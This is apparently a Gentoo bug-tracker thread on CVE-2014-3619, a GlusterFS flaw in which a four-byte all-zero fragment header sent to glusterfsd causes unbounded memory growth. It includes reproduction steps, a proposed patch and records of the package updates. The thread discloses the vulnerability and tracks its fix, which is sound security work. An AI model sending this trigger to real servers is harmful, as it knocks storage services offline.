From ${URL} : Description of problem: We construct some rpc messages and send it to the IP and port which glusterfsd listens, the memory usage goes up quickly until exhausted Version-Release number of selected component (if applicable): 3.3.0, 3.4.1, 3.5.0 Steps to Reproduce: 1. Start glusterfs services, and get the IP and port that one glusterfsd process listens 2. Run the attachement python script, which connects the IP and port and send four bytes 00 00 00 00 to the glusterfsd process 3. Watch the memory usage of the glusterfsd process. It will grow up quickly Actual results: Memory of the glusterfsd process grows up quickly till exhausted Expected results: Glusterfsd just ignores the messages Additional info: The bug seems in __socket_proto_state_machine, which goes into an infinite loop to malloc memories when handle the special message. The special message is "multi fragments in a single record", and some values are not reset when handle next fragment. We tested below fix and it seems work: if (!RPC_LASTFRAG (in->fraghdr)) { + in->pending_vector = in->vector; + in->pending_vector->iov_base = &in->fraghdr; + in->pending_vector->iov_len = sizeof (in->fraghdr); in->record_state = SP_STATE_READING_FRAGHDR; break; } @maintainer(s): after the bump, in case we need to stabilize the package, please let us know if it is ready for the stabilization or not.
Ok ago, I dropped all 3.4 versions from tree and bumped 3.5.3 which is not vulnerable. +*glusterfs-3.5.3 (23 Mar 2015) + + 23 Mar 2015; Ultrabug <ultrabug@gentoo.org> -glusterfs-3.3.0.ebuild, + -glusterfs-3.4.2-r1.ebuild, -glusterfs-3.4.4.ebuild, + -glusterfs-3.4.4-r2.ebuild, -glusterfs-3.5.1.ebuild, -glusterfs-3.5.2.ebuild, + +glusterfs-3.5.3.ebuild, +files/glusterd-r2.initd: + version bump, drop old and vulnerable wrt #541540, fix #536606 thx to Jaco + Kroon, fix #529676 thx to Christian Affolter +
CVE-2014-3619 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3619): The __socket_proto_state_machine function in GlusterFS 3.5 allows remote attackers to cause a denial of service (infinite loop) via a "00000000" fragment header.
@ Arches, please test and mark stable: =sys-cluster/glusterfs-3.6.5
amd64 stable
x86 stable
*** Bug 484016 has been marked as a duplicate of this bug. ***
ppc stable
ppc64 stable. Maintainer(s), please cleanup. Security, please vote.
GLSA Vote: No @ Maintainer(s): Please cleanup and drop =sys-cluster/glusterfs-3.1.2!
Cleanup done
All done, repository is clean.